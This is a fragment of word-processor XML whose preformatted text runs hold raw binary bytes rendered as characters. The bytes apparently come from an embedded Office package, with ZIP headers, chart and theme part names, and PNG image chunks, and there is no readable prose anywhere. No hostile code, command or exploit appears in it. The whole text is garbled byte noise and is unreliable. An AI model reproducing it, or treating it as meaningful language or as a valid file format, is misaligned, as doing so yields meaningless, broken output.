    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?##?##?##?##?##??0##-a?0## ## ## ## ## ##??</w:t>
        <w:br/>
        <w:t>??n??/x####IEND?B`??##$##$#If#####?##!v##h#5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>#v##?##v##?##v##?</w:t>
        <w:br/>
        <w:t>#v##S</w:t>
        <w:br/>
        <w:t>:V###?l##4##?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,?####5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>4?#######f4#?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>#v##?##v##?##v##?</w:t>
        <w:br/>
        <w:t>#v##S</w:t>
        <w:br/>
        <w:t>:V###?l##4##?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,?####5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>4?#######f4#?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>#v##?##v##?##v##?</w:t>
        <w:br/>
        <w:t>#v##S</w:t>
        <w:br/>
        <w:t>:V###?l##4##?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,?####5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>4?#######f4#?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>#v##?##v##?##v##?</w:t>
        <w:br/>
        <w:t>#v##S</w:t>
        <w:br/>
        <w:t>:V###?l##4##?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,?####5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>4?#######f4#?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>#v##?##v##?##v##?</w:t>
        <w:br/>
        <w:t>#v##S</w:t>
        <w:br/>
        <w:t>:V###?l##4##?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,?####5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>4?#######f4#?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>#v##?##v##?##v##?</w:t>
        <w:br/>
        <w:t>#v##S</w:t>
        <w:br/>
        <w:t>:V###?l##4##?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,?####5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>4?#######f4#?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>#v##?##v##?##v##?</w:t>
        <w:br/>
        <w:t>#v##S</w:t>
        <w:br/>
        <w:t>:V###?l##4##?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,?####5?####?#5?####?#5?####?</w:t>
        <w:br/>
        <w:t>5?####S</w:t>
        <w:br/>
        <w:t>4?#######f4#?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##?##$##$#If#####?##!v##h#5?####?#5?####?#5?####?#5?####?#5?####?#5?####?##v##?#:V###?l##?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,?####5?####?#4?#######?T##??##D#d#######</w:t>
        <w:br/>
        <w:t>#############?!4#?#?####################################?9###?#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>##c##?0######?###????#A####?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?Vh? #1#1###3#"??########???###?#####PK##########!#@#?A0###?#######[Content_Types].xml???n?0#E???#??U????*#??.??#`?##5~?c#?}'?,?JAb?(??='??#;?#"6?#|"r??io#?.???5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F??A???|1?????#?Q?a??3??k?</w:t>
        <w:br/>
        <w:t>?#?h???D?q-???j</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>r??R{???,?#|&gt;+?R?6??^#L"????ac?*?</w:t>
        <w:br/>
        <w:t>?m?Jd*;g~Q?#APr?u#?4???Я?##s?4??#`#*?7eIC??#???Z???KZ?|U5#D#q9?F?s?&amp;#??6?#q:?#?x??4ca???a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N#?p#?nw8??d`??E????#??nl???9?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}q??#?N/??k?#??c#[F2???3??2z?Q?????L?Z?%R6??zP?#????????#?T??](??#</w:t>
        <w:br/>
        <w:t>#???##[???j?,#?Z?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?#??#P?[i???##??T;GI?4Ew??=}?3??b9`5?Y?C?kρ?????#?9?#?o?~#?e?z??r?###??##PK##########!#?#?|####-#######drs/e2oDoc.xml???J?0#???#???C??t/E??E#`L&amp;m?M?$k????A??K?o#~??????8??#?w##?:#?G#?o?#O RFop#?#|S?C???:La6?@|j?`?9?R&amp;=тi#"?2??#?E?(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?Z??,?j?#?D#?R*??2????t~?6Q#???-?_VP7?#????}???#'??Np??#?/???#?(??6??#K???jJo&amp;]#e???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?:MC??|?d?4c.#N??</w:t>
        <w:tab/>
        <w:t>#??(?#??e'?l|?K}{??###??##PK##########!#e#s?;###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>### ###drs/charts/_rels/chart1.xml.rels???J#A#?{?w8??6I!#???#)$ ?K???]N?v??U.??#A#E#+?FT?#,#B????#?J?@??fa?g??g?F3K?s?J?RP??#pP?2?EDa????#?6L#?K?##??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>魮</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4v?3c?t?N?c)BS?#??</w:t>
        <w:tab/>
        <w:t>?~##?]???J(U???????`#?Z??N?o#x#L?#PP?#Nw????e#?&gt;nJ?0Aa?? ?cgo#}c?LEh(?1Gk?????9?})?W???iv|]N.???r4?_#??#?N&amp;??c&gt;|/??????????m#X???#?#Y?X??#3???9?8??#</w:t>
        <w:br/>
        <w:t>?K???w?W]#?-?#??###??##PK##########!#?#?F?###"#######drs/_rels/e2oDoc.xml.rels???</w:t>
        <w:br/>
        <w:t>?0#???#?n?z#?&amp;??Ы?#X??#?I?F?oo???qv?ov??1O?N?Gg##Y#??q?h{#???????YR?#C???L#?#?a?,#??!F???@3r?&lt;??t.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????N?O#?/??[#?n##??S???????L6???f?###COQ?K??Zd?S???_??###??##PK##########!#?n??###########drs/downrev.xmlL?_K?0#??#?C??/??</w:t>
        <w:br/>
        <w:t>)?k:T??!L?#??5?4???&amp;??7?2_.#???#???#?`=I?g#0??kKF????e</w:t>
        <w:tab/>
        <w:t>,DEZ??P?7#X4?'?????3???TB?R#?#????v?T??#)y#~t*&amp;9#?GuH??WYVp?,??N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>x?a???9</w:t>
        <w:tab/>
        <w:t>64????&lt;???}?Y?Iy~6??E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tab/>
        <w:t>#???;??#?#??&amp;?,?5??#Q?#xS????####??##PK##########!#'#?-###E#######drs/charts/chart1.xml?#Mo#E??0??X{w??k?#J?? #R?#????^2???#?'$?(#B#?\A ??P?*?g?#N?#???w?8)M**TKQf?y???9s??yJ[#?#</w:t>
        <w:tab/>
        <w:t>?#???#?"#'?d`??q5?Z??Y?)???:"?????o]???#sq;?#i#???G#k*D??t?hJR\?YN2?#3?b#?|?9&gt;#?)? ?#:%#K#?/A ?If??#Y???$"[,??$#?#N(#??b??#??X#?g{?#L#?mu$??l?#w?W?#* g?,&amp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O??##?g@j?2#?i9?#?T???,?#?4#?F</w:t>
        <w:tab/>
        <w:t>M?Q?.0#??S#r?&gt;"??#N??#9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"M"?</w:t>
        <w:br/>
        <w:t>6#m??QZ0?!?v;a#??#a#?_?#J?@?????j??#??#???nj?#?b^.\V?\#Q????#?#M??E?c??#F?&gt;?F#$aH?`#??#G#(#0??@`^A*#?@\?#JQ8?(5?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?7??@#?5?I?#???????#???#?&amp;,??3??#A?#?D??f#Q??Llp?%"?Gl&amp;?(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[??a&gt;!B-O20+??|???&lt;H&lt;!</w:t>
        <w:br/>
        <w:t>xt#p??n#?='p? ????Ej????6?u? t}?##????????#kP#?=??{?#?#?i5o?@???B##???,K#??РD2??Cj`#??C@P?T????#?!???V`j??Il?T??k?#D?%^!?Gd,G???SB?????#?,?0??#?$F.???Z?????#l%???8Xv???/??????:???|-I#?R? #|,H??r#*?"\J~#_#k????#??:s?#&gt;|?????m?$%SR8Z</w:t>
        <w:br/>
        <w:t>????3#Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???g ?#??##?@?#?O#???x??? #?#?f?)#</w:t>
        <w:br/>
        <w:t>??)#??SU?g#?~??;aZ??J%t??W(???v?;O??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??</w:t>
        <w:br/>
        <w:t>?h##(?W!#????V"#m:???%,P?B~?aLP?H##??)I?+?Zv/?#5????5??{????##??????~?d?m?I???wN6??i???,X6</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>擱</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#??q??#????????</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>允</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?*?K'?{i?j???{#????o??q?????cm?b?v&amp;&lt;?{#??V?%?[N#??H&amp;R?^?_?'W????`</w:t>
        <w:tab/>
        <w:t>?B?+?#?B#</w:t>
        <w:tab/>
        <w:t>?#n?</w:t>
        <w:tab/>
        <w:t>??#?Q?*?3#c?zk???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#????#???&amp;?T?-?e+r???l4??vr?N</w:t>
        <w:br/>
        <w:t>??X????Tu*=???????;#?</w:t>
        <w:tab/>
        <w:t>C?C?Ss?#???##?u??#?lW#??8?!????#?)U!&gt;???_????? `]???v?????p?f?á?|#T%?#F??FB???#&gt;#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#@?Z?Kh9/?#.t?TR(?&amp;I]?O?f???[??Q:b?Т?GT?lEe#?#3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r?%V/W"0??Hoz#h?.?w?.??????+26???#?\?B?"#?v?iCv#??~e?hj#+L##?n`??R??##????[?V?0)?s?ah?#??</w:t>
        <w:br/>
        <w:t>???{?*#???C??</w:t>
        <w:br/>
        <w:t>е?#??#u??#??#??H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??g?#ê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'???+R???$??sM??#?7_???</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>緘</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?##)#??n?#????#?n??? ?n?#??&gt;Z-H??%??#?VE#???\?-?epS?&amp;#????b #s????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-6?#?L?U&amp;?kI9G4??Z?#??2??X???#??L?"?#u?????sTN#?e;3*??#</w:t>
        <w:br/>
        <w:t>|??#V]?##&amp;?#M????/?h????M???V????5=?ZAt?i?S?D##?Oh?&gt;????J???P??\??Iw?&lt;??i??0?:?v?????+??.y?!?W?#?^}ygrf?YD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?*??z#??0?#??y???B?4#??!\???</w:t>
        <w:tab/>
        <w:t>????&amp;?$?O?g-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e?%???h?##/#??#??e?k;#9n#J#??##u??#??#8!&lt;Xt?</w:t>
        <w:tab/>
        <w:t xml:space="preserve">?{5??m?g#??/x#??n7,#e??%~?n?##?#??####?#???W3?+?H?H?}?#?#?(?p??7?q?????\#ey#[?.?] </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>i?I?z~2M?j#2&amp;?##?N4(`??U?na?[#?Q##?Vu?Lowr??????????????###??##PK##########!##l#'?###T#######drs/theme/themeOverride1.xml?YMo#E#?#?#F{oc'v#Gu??#H?F?[??xw?;???jf??7?#??##q?#7##??J\?</w:t>
        <w:tab/>
        <w:t>#A??#xgfw?#?I?FPA}H?????3#?z?~??!#????/?&lt;D#?#4</w:t>
        <w:tab/>
        <w:t>???a?????I?#OH?#?]?x???x]E$&amp;?`??#A '???EJ??KK??X^?)I???#+x#?R ?#???r???#c?x# ?gb?g#??#t?#??O??#r*?L?C??#?#???W#bX*x??j??-m\]???$?#?-??O6/?##,#?"##J??F??V!?#????z?n?^?3#??$?l)?l???\f</w:t>
        <w:tab/>
        <w:t>d????????/?_?????t???#+????#~????\v?#d??9|????:x#???9|?Jk???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(b49?C?????#2?l?#?#?Z#???#???*?&lt;Q?j-????#@##V4Aj??1??&amp;?8#</w:t>
        <w:tab/>
        <w:t>??#?Np?#?????/h???)N?#????_=??#&lt;;~?????#~???Y?8</w:t>
        <w:tab/>
        <w:t>?^~????F&lt;???/?????O~???j ???#_&gt;???#_}??w?*?#???!??D7?#??18f??ZNF?|3?#??#?I(q???</w:t>
        <w:br/>
        <w:t>?=#9?S??8vt?#?;#?</w:t>
        <w:br/>
        <w:t>x}r?1x#???#?w??#?r?:\TFaG?*?y8I?j?bR??c|X???#'??I</w:t>
        <w:br/>
        <w:t>?????x7"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  <w:br/>
        <w:t>?$!</w:t>
        <w:br/>
        <w:t>?w???</w:t>
        <w:br/>
        <w:t>??R??u???K&gt;V?.E#L+C2?#??f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b?{#u8??z?#?H?</w:t>
        <w:br/>
        <w:t>?*?##??:?(#W?#?#~#?????T?e\O*?tH#G??HY5?#KI???X?i?e??E</w:t>
        <w:br/>
        <w:t>E#?d?????[??#?8??#h#??#?#(Q??????r?C?3?#'#?}?#'???m#:&amp;?</w:t>
        <w:br/>
        <w:t>D????\^'?????11T#??puL??#nF?????#n??#_????m??MX??zf?#Q/???.##}??y#O?=#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1?D?#?w?????yQ?_&lt;%?X##Z?E?F?l???1el????f?-a?</w:t>
        <w:tab/>
        <w:t>?0???$)Nai#_u'?###</w:t>
        <w:br/>
        <w:t>l? ??GTE?#??i?{ZH(3?D)?pX4??5#6??#5??#b?Cb??#;????F!?X#J??*Z?#?l?J&amp;#|{#eum???i?##m??:??P#!/\??"???A?#?(??q^???#f$?q?9??bbr?)?#??#s#??~??n????#?#?#}p&lt;%j%m--?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??%Ieu?#???I??</w:t>
        <w:br/>
        <w:t>?e</w:t>
        <w:tab/>
        <w:t>??lG????%????M#?8m{c8'??8??K???,??$_</w:t>
        <w:tab/>
        <w:t>[??6?.??ùcn#?????}?a?#R!?#??-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?*+#?hM???&amp;???#?`??Y??#??Y#qtSK?c?r?K#:v?1?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D?cH?.U?'?#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??6?\rΚ?|#fpv#?4?#??#?;??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>!#6???y?[????bZ??\)????#?????J?3??E??HwJ??BE#X(???#?q0?#?#???#?</w:t>
        <w:br/>
        <w:t>??A#??sV?ik8D?}#"Aa=R? d#h?T?)????eE?L?????2?f??!aC??zm?P#?n?$?#?;Y?s?A?Por???0Y???#??w&gt;???)???&amp;?ab?=???v?????eG??6??w??#???M#ι?Z??x??##Y??##?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Q</w:t>
        <w:br/>
        <w:t>wHH????</w:t>
        <w:br/>
        <w:t>??_0?:????#~???l??/?#?#i#G?q?????(#?l??/?#??-?#???,?&gt;g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a'?vla?!?'[#???A?$??%l?/###??##PK##-#########!#@#?A0###?#####################[Content_Types].xmlPK##-#########!#8?!??###?#################a###_rels/.relsPK##-#########!#?#?|####-#################`###drs/e2oDoc.xmlPK##-#########!#e#s?;###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>### #############?###drs/charts/_rels/chart1.xml.relsPK##-#########!#?#?F?###"#################</w:t>
        <w:br/>
        <w:t>###drs/_rels/e2oDoc.xml.relsPK##-#########!#?n??#####################?###drs/downrev.xmlPK##-#########!#'#?-###E#####################drs/charts/chart1.xmlPK##-#########!##l#'?###T#################?###drs/theme/themeOverride1.xmlPK##############?########?#######?b##?N?####?&gt;?G#?#?##?J??U??#*?######??####?##n#?"?##?&gt;?G#?#?##?J??U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?###P#####?cz?####sRGB#??#?####gAMA##??#?a#### cHRM##z&amp;##??##?###??##u0##?`##:?###p??Q&lt;###</w:t>
        <w:tab/>
        <w:t>pHYs#########?&amp;??##?zIDATx^?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?]E}?#_????T???1Wk4UR?#WS??j?R##?D%?EDk%EP??b?$Jn?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>R?6iD?'V?##&lt;???#???@#??C?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???EL?%&gt;??o?lf?Y?7k?5k?w??y#{?5???????#?q??##?##?##?##?##?##?.#2???##?##?##?##?##?##?.?q??u?##@##@##@##@##@##@?#?#?#?##?##?##?##?##?@?#?1??#??##?##?##?##?##?#?!?##?##?##?##?##?##?8##?#/#?&gt;#?##?##?##?##?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?##?##?@?#?1??#??##?##?##?##?##?#?!?##?##?##?##?##?##?8##?#/#?&gt;#?##?##?##?##?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?##?##?@?#?1??#??##?##?##?##?##?#?!?##?##?##?##?##?##?8##?#/#?&gt;#?##?##?##?##?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?##?##?@?#?1??#??##?##?##?##?##?#?!?##?##?##?##?##?##?8##?#/#?&gt;#?##?##?##?##?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?##?##?@?#?1??#??CL?6M#:t??????????y???#G?r$##?#?_?^?[??uс##?}??"?BS????k?Y&amp;2????_??????:8}??z?#??-[?????X?"/j?##?#P??z???S?La?_?/?]w]?4?b#????##"]e?+W?#??ùI?{w?&gt;#=?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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\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S?#?q??#?E?!u?g?ъ?.s922?8q?8qb?K??bCa?-[V??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??????????'#?,?K?,i?h?????n??`?#?o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???e??z??'?p??</w:t>
        <w:tab/>
        <w:t>????v#Sy??3</w:t>
        <w:br/>
        <w:t>;s?L?}??#(Y/_???e&amp;C?G?????Q????9D??6X?K??#?'??#???????3??e?:??#?&gt;?!?S?Lo??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?-??h???#?h??C-#`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7?m??#]o?U3?#?l\???#R?/#??te?????CGjV?\?!V??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>巹</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?~?|Ι3??B#o$?l???#K#??]o?l?U?e?C?9????{?i??4??&gt;?O??4?i?\P(?n??? Tv?#?O#D??"e???8???~???;w?={?#A??_?^???f???#?U?#%^?#??|?0???j</w:t>
        <w:tab/>
        <w:t>?#C?Y?U?(S?#???,3%???Q?|#}#?LS#?##?l???eTN??/??Q?T?r`?\W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X+</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>￥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>9??QYVG??^PPx??./s?:?.?F?v??;aM?#??#}Y]d?R?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>短</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&gt;?x9/X9/Я???#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?l??????3???????#???????v-3)??1?P?#?#W?*???Hp??J?W??</w:t>
        <w:br/>
        <w:t>C??Q?b?0/?y`)_??-/?#?gu?C?H?[&gt;???#?????!&gt;?#??????#)?Y?P}??????;?M7??!Js?8#?^ ??2R&gt;?#1d?=??L?1??wyq??#?\##&gt;?%?r??#?pk?5??~???+_?J?;?.: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Tt?V?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>矩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&gt;?0?*#?[~??6#?#???W???O?%DySk?6?6c???#?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b?L?[?_^?I?o?-????+</w:t>
        <w:tab/>
        <w:t>#vZ?azcCop?SM#?e?E?#?9</w:t>
        <w:br/>
        <w:t>??t?,?dpy#]W??k??J??/??g?????!&gt;Yo`?s?q?#?#?r?u??v??T?"??h#?7?Z????y?s?5b??#?$??sd?V?#??n??|d#b????/?#???S9###jM#?=K???y</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>晭</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?eYc?r]@?@???K?p?</w:t>
        <w:tab/>
        <w:t>??~?????g=?Y?/|??????y&amp;??#-??|?1????????R_?#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>餼</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??(??????H????i}</w:t>
        <w:br/>
        <w:t>?i??4???,?u?#??@]5?'_|?????0?#??I#_}???FW??T4= k?}?BY4m?##?l?#?P?L?L?p1?e??^#?1?zxd?Qu?\wB#[Z'??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>顒</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7?(??@*?v??f#?.????S]???#G??ib?#AG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>m?#m#Tj??!Q??]*??????д??^??v?m????#C????j?h=?#^??u~?y?sZ/#??#-#??#[Z?#?P???&gt;#M??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>碶</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??l??K???m?v?/?1G3}?P7?E##?5????,{#??F?d</w:t>
        <w:br/>
        <w:t>?0?Y?PnGlz[[?!++?#?&lt;b??l??#?2#NV?Y?fY#&gt;'?t?qA??Q?M?6?v:-?#?`m??)??T?]???a????g?}6KC??G????;wn??????w?c#?W;??????~?%E]#?e?6???I????`ak?p???|?P????##c???Y?f?###?#1??##}fI5P???K?###&lt;(????8?#??q?Ib????)#?V???B?7??#??#L?$?"$k?U??2??ym?u?*hy???#?4?##?"#?N?#???w?gp?mr8#CE?,S#?#?!?"%G=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2Mow\</w:t>
        <w:br/>
        <w:t>??????i?L</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?Ks?(L?7=?iT?y?y???b??k?d????:?M?E?k?*??B6?t#?&lt;w??QdD?FC?J##2?YGX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?????B2??#z?P???1?#?,?T???d*o!?!?u???}?U?#?x#?#&gt;??O##??#??ù?K?##??j?4??+??Zkg2???./Z?????S}/;]?#7?N?3??#?2;???cW#?#?2?#??1q??]??#7#?{???5??#???pE?A?]???t?Y?#?~???????Y?ld??#?H???????t???PoD}?1?#G?^?=??????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>d??f\?#?lV??????????o?m??zD?jг?7?@?p@?#???e?y4?A?{#\?1D??????11t??U7?R?o??s[?P????7?Z:^J?;VeNM?e??s?mw???#g?P%Ke[?#??#?#&gt;uD??#?????#?J6??-\??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O;???$?O??p)w??EG?|=?\????'??#M?#??????5?y??&lt;??`????#??S?=t??%-??M?#^??R??c</w:t>
        <w:br/>
        <w:t>?Y,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??2?5?T</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(???w?y?zA?5?y?[?#?}#?#oV#\4~}??F?G#Y#~?K</w:t>
        <w:br/>
        <w:t>??"#?E?!]7??c5???ZU#???R#??#z]?@Q#?t?=ur?#????????P?##?#z[c#Y*##??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
